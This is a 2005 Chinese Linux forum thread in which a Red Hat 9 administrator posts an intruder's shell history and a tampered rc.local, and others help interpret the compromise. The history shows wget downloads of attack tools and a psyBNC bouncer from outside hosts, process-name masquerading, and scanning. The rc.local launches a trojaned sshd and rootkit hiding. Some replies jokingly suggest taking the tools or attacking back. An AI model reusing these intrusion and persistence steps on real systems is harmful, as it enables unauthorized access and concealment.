论坛徽章:: 0

电梯直达

1楼 [收藏(0)] [报告]

发表于 2005-10-08 12:05 |只看该作者 |倒序浏览

系统是redHat 9，自己编译的内核 2.4.27 ，装了apche、mysql、php、proftp、qmail。 \r\n\r\n今天早上登录系统，查看系统日志，发现/var/log/ 下面被删了个干净， \r\n再查看history 发现下面的内容 \r\n 2 cd /dev/.man \r\n 3 cd /dev/ida/.man \r\n 4 wget www.warrlop.0catch.com/a.tgz \r\n 5 wget 209.63.57.10/a.tgz \r\n 6 ftp \r\n 7 ps x \r\n 8 wget www.rossi25.go.ro/xx.tgz \r\n 9 tar xzvf xx.tgz \r\n 10 rm -rf xx.tgz \r\n 11 cd .sh \r\n 12 ls \r\n 13 ./x 65.35 \r\n 14 ./x 216.48 \r\n 15 ./x 216.49 \r\n 16 exit \r\n 17 cd /var/tmp\'ls -a \r\n 18 cd /var/tmp;ls -a \r\n 19 cd /var/dev \r\n 20 cd /dev \r\n 21 mkdir \".\" \r\n 22 mkdir \" \" \r\n 23 cd \" \" \r\n 24 wget iceghost.go.ro/b.tar.gz \r\n 25 RM -RF no_user.phtml \r\n 26 rm -rf no_user.phtml \r\n 27 wget geocities.com/kiaxk/b.tar.gz \r\n 28 wget http://www.psychoid.net/psyBNC2.3.1.tar.gz \r\n 29 tar zxvf psyBNC2.3.1.tar.gz \r\n 30 rm -rf psyBNC2.3.1.tar.gz \r\n 31 mv psybnc html \r\n 32 cd html \r\n 33 ls -a \r\n 34 ps -ax \r\n 35 mv psybnc [httpd <defunct>;] \r\n 36 mv psybnc \"[httpd <defunct>;]\" \r\n 37 mv psybnc \"qmail-clean\" \r\n 38 ls -a \r\n 39 make \r\n 40 ps -ax \r\n 41 mv psybnc \"/var/qmail/bin/qmail-queue\" \r\n 42 mv psybnc \"qmail-clean\" \r\n 43 PATH

ATH \r\n 44 PATH=

ATH \r\n 45 \"qmail-clean\" \r\n 46 uname -a \r\n 47 id

dingzhener

白手起家

论坛徽章:: 0

2楼 [报告]

发表于 2005-10-08 14:22 |只看该作者

系统被入侵，帮帮忙阿！！！非常急！！！关键字：psybnc

发现rc.local被修改，如下：\r\n\r\n\r\nkillall -9 sshd 2>;/dev/null\r\n/bin/.../sshd/sbin/sshd1 2>;/dev/null\r\n/bin/.../hate/sk >; hide 2>;/dev/null\r\n/bin/.../hate/sk i `/sbin/pidof /bin/.../sshd/sbin/sshd1` >;>; hide 2>;/dev/null\r\nrm -rf hide 2>;/dev/null\r\nrm -rf /var/lock/subsys/sshd 2>;/dev/null\r\n/bin/up2date 2>; /dev/null\r\necho 1 >; /proc/sys/net/ipv4/tcp_syncookies\r\necho 1 >; /proc/sys/net/ipv4/icmp_echo_ignore_all

实战分享：从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线！ | 新一代分布式关系型数据库RadonDB知多少？

dajun

小富即安

论坛徽章:: 0

3楼 [报告]

发表于 2005-10-08 14:44 |只看该作者

系统被入侵，帮帮忙阿！！！非常急！！！关键字：psybnc

你完蛋了，重装吧\r\n重装之前最好把他的东西都找出来（借我用用：））\r\n\r\n\r\n下次用强一点的密码

实战分享：从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线！ | 新一代分布式关系型数据库RadonDB知多少？

dingzhener

白手起家

论坛徽章:: 0

4楼 [报告]

发表于 2005-10-08 14:49 |只看该作者

系统被入侵，帮帮忙阿！！！非常急！！！关键字：psybnc

什么阿？要重装也要搞明白，人家怎么把自己的系统弄乱的阿，这个入侵的人装的是什么软件阿？还有那些修改rc.local，是做什么用的？

实战分享：从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线！ | 新一代分布式关系型数据库RadonDB知多少？

dajun

小富即安

论坛徽章:: 0

5楼 [报告]

发表于 2005-10-08 14:59 |只看该作者

系统被入侵，帮帮忙阿！！！非常急！！！关键字：psybnc

那个家伙好象是暴力破解了你的口令（也许，好象，大概）\r\n然后又拿到了root权限，或是直接破解了root的密码\r\n然后有用你的机器去破解别人的机器\r\n\r\nrc.local里是拿他的sshd替换你的sshd，这样他就可以\r\n自由登陆你的机器，也许还可以记录你的口令\r\n似乎还装了 rootkit ，（不确定） /bin/.../hate/sk

实战分享：从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线！ | 新一代分布式关系型数据库RadonDB知多少？

dingzhener

白手起家

论坛徽章:: 0

6楼 [报告]

发表于 2005-10-08 15:11 |只看该作者

系统被入侵，帮帮忙阿！！！非常急！！！关键字：psybnc

噢，先谢谢你，我再查查资料，先搞明白，重装系统看来是必要的了。

实战分享：从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线！ | 新一代分布式关系型数据库RadonDB知多少？

第二场雪

丰衣足食

论坛徽章:: 0

7楼 [报告]

发表于 2005-10-08 23:19 |只看该作者

系统被入侵，帮帮忙阿！！！非常急！！！关键字：psybnc

到现在还一个Linux肉鸡没有

实战分享：从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线！ | 新一代分布式关系型数据库RadonDB知多少？

fwizard

小富即安

论坛徽章:: 0

8楼 [报告]

发表于 2005-10-09 08:53 |只看该作者

系统被入侵，帮帮忙阿！！！非常急！！！关键字：psybnc

原帖由 \"dajun\" 发表：\n重装之前最好把他的东西都找出来（借我用用：））\r\n

\r\n根据history里内容去找啊,有能力的话把那片的机器搞定了,估计资料还挺多的呢

实战分享：从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线！ | 新一代分布式关系型数据库RadonDB知多少？

fwizard

小富即安

论坛徽章:: 0

9楼 [报告]

发表于 2005-10-09 08:58 |只看该作者

系统被入侵，帮帮忙阿！！！非常急！！！关键字：psybnc

楼主把你的shadow用john跑一下,看有没有弱口令,有的话估计是弱口令出了问题.如果不是的估计问题出在你的服务上了,最有可能的就是apache和mysql了,如果是这两个的话注意打补丁和防止注入.入侵者主要的动作是提升权限和留后门吧,把后门相关的东西清一下,然后把ssh重装一下,应该问题不大.关键是找出入侵原因,不然即使是重装了别人还能进来的